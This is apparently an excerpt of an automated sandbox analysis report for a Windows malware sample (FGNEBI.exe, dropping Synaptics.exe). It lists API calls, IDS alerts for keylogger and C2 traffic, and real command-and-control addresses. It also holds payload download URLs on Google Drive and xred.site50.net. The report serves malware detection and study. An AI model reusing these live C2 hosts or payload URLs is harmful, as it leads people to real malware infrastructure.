Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DADD92 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00DADD92
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DE2044
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DE219F
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DE24A9
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_00DD6B3F
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_00DD6E4A
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DDF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DDF350
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DDFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00DDFDD2
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DDFD47 FindFirstFileW,FindClose,	2_2_00DDFD47
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00232044
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_0023219F
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_002324A9
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	10_2_00226B3F
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	10_2_00226E4A
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_0022F350
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0022FD47 FindFirstFileW,FindClose,	10_2_0022FD47
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,	10_2_001FDD92
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_0022FDD2

Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: excel.exe

Memory has grown: Private usage: 1MB later: 69MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49715 -> 69.42.215.252:80
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49727 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49727 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49742 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49743 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49744 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49744 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49746 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49740 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49747 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49749 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49752 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49752 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49756 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49756 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49753 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49754 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49755 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49711 -> 172.217.16.206:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49717 -> 172.217.16.206:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49716 -> 172.217.16.206:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49723 -> 172.217.16.206:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49724 -> 172.217.16.206:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49712 -> 172.217.16.206:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xred.mooo.com

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

Source: Joe Sandbox View	IP Address: 172.111.138.100 172.111.138.100
Source: Joe Sandbox View	IP Address: 69.42.215.252 69.42.215.252

Source: Joe Sandbox View

ASN Name: VOXILITYGB VOXILITYGB

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DE550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

2_2_00DE550C

Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Ped9FFu77ZILljDRdPx4jmMXgH_9clhvCrKcOs0vHo5Wh5NQRqtD2bTclKsZHpXc_yNTCnedWDYMKz3uCDArCyXwnKDw6vH-8GIIWrExz2AkW205gWJXFurdY0IJGp63ZylB0bEx3aie6cdBXZS-_R3SSHM6X3X9WwZL56Wjt5UdLiU7-iFR_yg
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=b1T8znPmh3zSMqQEaToyoyRR9X7BvTrQG4NcFjWxcs5T5xI3izk4l5pYgmo3LnBbUuh724lxK41R0ljONN_39-P4Okj2pNHYDUcv4mYcXn-23pqVqy7cjDrErXAy4iNrt2dW3TbnBbmAIj_7BLQGQmvnSpM5VdzQNxSbC-2fZwUqd-RZQ6y5YrY
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: docs.google.com
Source: global traffic	DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic	DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4mllYNGJPAIPIbtLCcv8_ugLJ2jVzO3XbiV-I7ETyrZ4MDatLmkmhrurGmooaW-etctaRYLXoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:34:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-SdsENuDFnIx-R_ESttZWeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Ped9FFu77ZILljDRdPx4jmMXgH_9clhvCrKcOs0vHo5Wh5NQRqtD2bTclKsZHpXc_yNTCnedWDYMKz3uCDArCyXwnKDw6vH-8GIIWrExz2AkW205gWJXFurdY0IJGp63ZylB0bEx3aie6cdBXZS-_R3SSHM6X3X9WwZL56Wjt5UdLiU7-iFR_yg; expires=Tue, 01-Jul-2025 10:34:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Xd3_EMkfUx_20vx6MfwG2icaDFhALM4aQMyz5JJoKY2xxg-QTEFjY6pGG9gUooI2KuwvanQMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:34:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-5w9UjrPxoPLcZp8oVXg14w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=b1T8znPmh3zSMqQEaToyoyRR9X7BvTrQG4NcFjWxcs5T5xI3izk4l5pYgmo3LnBbUuh724lxK41R0ljONN_39-P4Okj2pNHYDUcv4mYcXn-23pqVqy7cjDrErXAy4iNrt2dW3TbnBbmAIj_7BLQGQmvnSpM5VdzQNxSbC-2fZwUqd-RZQ6y5YrY; expires=Tue, 01-Jul-2025 10:34:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5MOdsMS9KwVoKhp4-uobBjly47LrC_d_StgbXjCxzPyxTQOxbztRhPV1_lKpPb60sDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:34:38 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-rA1N6EBTeHmyzOzX0eCDyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7XEmoZLgH5Fm9-v4-H_mQ85b61KP1oWHkMlt2NEtwWau7v0JES7SD-mEsa4uX4fNRLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:34:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-l6_yqnUDhPkx2xJ1KyRNGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: ~$cache1.3.dr	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978D
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
Source: ._cache_FGNEBI.exe, 00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-score.com/checkip/Brave-Browser
Source: Amcache.hve.15.dr	String found in binary or memory: http://upx.sf.net
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
Source: ~$cache1.3.dr	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: ~$cache1.3.dr	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: ~$cache1.3.dr	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/Q
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/X
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/n
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/p/cspreport
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: ~$cache1.3.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: ~$cache1.3.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%%
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
